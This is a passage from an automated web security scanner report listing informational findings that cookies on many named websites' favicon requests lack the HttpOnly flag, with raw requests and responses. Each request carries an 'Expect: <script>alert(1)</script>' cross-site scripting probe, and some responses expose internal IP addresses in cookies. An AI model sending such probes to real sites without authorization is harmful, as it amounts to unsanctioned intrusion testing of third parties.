The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.embroiderydesigns.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
ETag: "17cbbfa47befc51:12b9"
Accept-Ranges: bytes
Set-Cookie: X-Mapping-aobfoppo=349BBB4601CE723F0647EB63595F8A41; path=/
Content-Length: 2238
Date: Wed, 04 May 2011 00:42:29 GMT
Last-Modified: Tue, 22 Nov 2005 15:44:37 GMT
X-Strangeloop: RCache
Server: Microsoft-IIS/6.0
X-SL-RCache: Cached
X-Powered-By: ASP.NET
Content-Type: image/x-icon

...... ..............(... ...@...................................fff.....www.___.........)))..33.BBB.UUU.....3ff.3........f...f...3..333.......3.....f33..f3.3f..........33..3...MMM.........999..f3.f3
...[SNIP]...

15.140. http://www.ferrellgas.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ferrellgas.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ferrellgas.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Set-Cookie: ARPT=UPKKWVS172.30.5.25CKKYJ; path=/
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:05:13 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; cha
...[SNIP]...

15.141. http://www.findaproperty.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.findaproperty.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.findaproperty.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
Date: Wed, 04 May 2011 01:15:11 GMT
Content-Length: 60
Set-Cookie: TDPG=l2dvKdd/8nuRw1kmmbv8FBvoOLWMKrYq5v4l3M0fq8hmZQaE/7RbYSMr9UID93B4z/+vKK5dvcmUpds=; path=/

The page cannot be displayed because the expectation failed.

15.142. http://www.finn.no/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.finn.no
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.finn.no
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 01:54:34 GMT
Server: Apache/2.2.16 (Debian)
Vary: Accept-Encoding
Content-Length: 389
Connection: close
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: finnlb-?Finn-web?finnweb=INCFFLFA; Expires=Fri, 03-Jun-2011 11:54:33 GMT; Path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...

15.143. http://www.fordforum.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fordforum.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.fordforum.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 01:40:39 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7a DAV/2 PHP/5.2.6
Content-Length: 389
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: BIGipServerAFUWEB_www_pool=1090195628.20480.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...

15.144. http://www.freemdeicalin.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freemdeicalin.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.freemdeicalin.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.0 417 Unknown
Content-Type: text/html
Date: Wed, 04 May 2011 01:51:42 GMT
Content-Length: 60
Set-Cookie: 7s51872mp2=805470218.20480.0000; path=/
Connection: close

The page cannot be displayed because the expectation failed.

15.145. http://www.garden.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.garden.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.garden.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Length: 0
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="IDC DSP COR CUR PSAi IVAi CONi OUR OTRo UNRo IND UNI PHYi ONL PUR FIN NAV"
Set-Cookie: TLTSID=3ADA269D4C281F5508E9E58BB5DD7507; Path=/; Domain=.garden.com
Set-Cookie: TLTUID=3ADA269D4C281F5508E9E58BB5DD7507; Path=/; Domain=.garden.com; expires=Wed, 04-05-2021 01:53:06 GMT
Date: Wed, 04 May 2011 01:53:05 GMT
Set-Cookie: NSC_Qfut-wjqt=e24066383660;path=/


15.146. http://www.gemvara.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gemvara.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gemvara.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=YKMIMIS192.168.100.34CKOKJ; path=/
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Expires: Mon, 02 May 2016 06:37:28 GMT
Last-Modified: Fri, 29 Apr 2011 20:29:00 GMT
Cache-Control: max-age=157700000;public;
Etag: W/"1150-1304108940000"
Accept-Ranges: bytes
Content-Language: en-US
Content-Length: 1150
Date: Wed, 04 May 2011 01:04:07 GMT

............ .h.......(....... ..... ........................................................................................................................~......p....~..............................
...[SNIP]...

15.147. http://www.gmaccessorieszone.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gmaccessorieszone.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gmaccessorieszone.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Set-Cookie: ARPT=VIMLQLS192.168.1.65CKMMY; path=/
Date: Wed, 04 May 2011 03:19:42 GMT
Server: Apache/2.2.3 (Red Hat)
Content-Length: 480
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...

15.148. http://www.goestores.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.goestores.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.goestores.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:27:01 GMT
Set-Cookie: BIGipServerFE_goestores=891372042.20480.0000; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; cha
...[SNIP]...

15.149. http://www.goinsurancerates.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.goinsurancerates.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.goinsurancerates.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Wed, 04 May 2011 01:10:31 GMT
Content-Type: image/vnd.microsoft.icon
Connection: keep-alive
X-Powered-By: PHP/5.3.4
Content-Length: 0
Set-Cookie: uid=ChViCE3Ap4dEeU9rBGjsAg==; expires=Thu, 03-May-12 01:10:31 GMT; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: uid=riSHNU3Ap4e9wwc0BBC4Ag==; expires=Thu, 03-May-12 01:10:31 GMT; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"


15.150. http://www.greentreepayday.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.greentreepayday.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.greentreepayday.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: Resin/3.1.8
ETag: "9kDr3Z5tiX0"
Last-Modified: Wed, 07 Apr 2010 11:18:30 GMT
Accept-Ranges: bytes
Content-Length: 1406
Date: Wed, 04 May 2011 03:36:07 GMT
Set-Cookie: epersist=hTlrdfAsHlnlxiak0jcBLxoBfj8+Jx+dW360Wp64yDC6uDvQjcXz9FrdTqfp4TjS6ANcH1wa59kI; path=/

..............h.......(....... .....................................w.W>..................lL.......7.......:.q\8..qR...l.......r.....gQ*.W>..............kV0.....[C....s.......v......................z
...[SNIP]...

15.151. http://www.guesssms.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.guesssms.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.guesssms.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
Date: Wed, 04 May 2011 03:33:03 GMT
Content-Length: 60
Set-Cookie: BIGipServerpool-207.97.255.200-GSS-WWW=1845602496.20480.0000; path=/

The page cannot be displayed because the expectation failed.

15.152. http://www.handson.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.handson.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.handson.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.0 417 Expectation failed
Server: squid/2.7.STABLE9
Date: Wed, 04 May 2011 02:17:10 GMT
Content-Type: text/html
Content-Length: 1659
X-Squid-Error: ERR_INVALID_REQ 0
X-Cache: MISS from att-prodvmweb01.rack2.mforma.com
X-Cache-Lookup: NONE from att-prodvmweb01.rack2.mforma.com:80
Via: 1.0 att-prodvmweb01.rack2.mforma.com:80 (squid/2.7.STABLE9)
Connection: close
Set-Cookie: BIGipServerport_80_handson=2802493632.20480.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>ERROR: The requested
...[SNIP]...

15.153. http://www.healthwealthraffle.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.healthwealthraffle.org
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.healthwealthraffle.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 01:52:24 GMT
Server: Apache/2.2.17 (Unix) mod_auth_pgsql/2.0.3 PHP/5.2.17
Content-Length: 511
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: BIGipServerBlackfund-80-Pool=2739052300.20480.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...

15.154. http://www.hear-there.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hear-there.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hear-there.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Set-Cookie: JSESSIONID=74ABF3BA856CD1CAAD021F972DF21583.web110; Path=/; HttpOnly
X-ServedBy: web110
Pragma: cache
Cache-Control: private,max-age=604800
Last-Modified: Fri, 16 Oct 2009 16:57:33 GMT
Content-Type: application/octet-stream;charset=UTF-8
Content-Length: 5686
Date: Wed, 04 May 2011 03:48:51 GMT
Server: SSWS
Set-Cookie: BIGipServerWebServers=1845602496.20480.0000; path=/

..............h...&... .... .........(....... ....................................................................$...%...'.. "..#&.. !..%(..)*..(0.!%&."'+.!(,.$)+.(+-.-/0.256.578.3<=.2:B.8<C.9?D.?D
...[SNIP]...

15.155. http://www.helpwithmybank.gov/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.helpwithmybank.gov
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.helpwithmybank.gov
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:17:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 6122
Content-Type: text/html
Set-Cookie: BIGipServerhwmb_pool=2732615690.20480.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Temp
...[SNIP]...

15.156. http://www.henryford.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.henryford.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.henryford.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Length: 0
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:35:54 GMT
Set-Cookie: HFHS_Medseek_Persistence=34082988.20480.0000; path=/


15.157. http://www.heralddemocrat.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.heralddemocrat.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.heralddemocrat.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Length: 1738
Content-Type: text/html
Server: Microsoft-IIS/6.0
IISExport: This web site was exported using IIS Export v4.2
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:45:30 GMT
Connection: close
Set-Cookie: NSC_DNTQ-OfxDNT=ffffffff09021f3545525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; cha
...[SNIP]...

15.158. http://www.hlj.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hlj.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hlj.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 04 May 2011 03:35:59 GMT
Content-Type: image/x-icon
Connection: keep-alive
Keep-Alive: timeout=60
Vary: Accept-Encoding
Content-Length: 318
Last-Modified: Tue, 07 Jun 2005 04:03:05 GMT
Accept-Ranges: bytes
Expires: Wed, 04 May 2011 04:35:59 GMT
Cache-Control: max-age=3600
X-UA-Compatible: IE=EmulateIE7
Set-Cookie: HLJUserId=22X/QU3AyZ8hXh7lEHujAg==; expires=Thu, 03-May-12 03:35:59 GMT; domain=hlj.com; path=/

..............(.......(....... ...............................................ff..33..33..............f...3...................wwwwwDGwwwwww..WwwwwwD0.wwwwwwp.wwwwwwq.www@..s.wwwp.#t.wwwp.w0..W01.w@. 7
...[SNIP]...

15.159. http://www.homeschoolreviews.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.homeschoolreviews.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.homeschoolreviews.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:19:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: HSR=5/3/2011 9:19:27 PM; expires=Sat, 04-May-2041 02:19:27 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 15761


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><me
...[SNIP]...

15.160. http://www.hondacivicforum.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hondacivicforum.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hondacivicforum.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 01:59:53 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7a DAV/2 PHP/5.2.6
Content-Length: 389
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: BIGipServerAFUWEB_www_pool=1090195628.20480.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...

15.161. http://www.horizon-bcbsnj.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.horizon-bcbsnj.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.horizon-bcbsnj.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Length: 0
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:28:08 GMT
Set-Cookie: BIGipServerhorizon_bcbsnj=1911953218.20480.0000; path=/


15.162. http://www.hrmorning.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hrmorning.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hrmorning.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 00:44:05 GMT
Server: Apache/2.2.3 (Red Hat)
Content-Length: 472
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: Coyote-2-cc593cc2=d059172d:0; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...

15.163. http://www.iccsafe.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.iccsafe.org
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.iccsafe.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 NOT FOUND
Date: Wed, 04 May 2011 00:46:11 GMT
Server: Microsoft-IIS/6.0
MicrosoftSharePointTeamServices: 12.0.0.6421
X-Powered-By: ASP.NET
Exires: Tue, 19 Apr 2011 00:46:11 GMT
Cache-Control: private,max-age=0
Content-Length: 753
Public-Extension: http://schemas.microsoft.com/repl-2
Set-Cookie: MSCSProfile=287001FD2674671C3E8AFF46EA22B2A247C55294F70F72F04A1F0A978A40E99997043B008192F604BB962037760358874502B454194CF2984B395D83F068E5E58A8A66BACE0E9CE6C013C861964522FAD40D000D51C28AF1EC2FA15DFB3074603CEB7BD4446E0915C35B17B2A66B8574FB83C087AB5A78D925FBD42AE90D6A23; path=/

<html>
<head>
   <meta HTTP-EQUIV="Content-Type" content="text/html; charset=utf-8" />
   <meta HTTP-EQUIV="Expires" content="0" />
   <noscript>
       <meta http-equiv="refresh" content="0; url=/_layouts
...[SNIP]...

15.164. http://www.icing.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.icing.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.icing.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:15:37 GMT
Set-Cookie: Coyote-2-d80f9cf5=d80f9ce6:0; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; cha
...[SNIP]...

15.165. http://www.idahopower.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.idahopower.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.idahopower.com
Accept: */*
Proxy-Connection: Keep-Alive
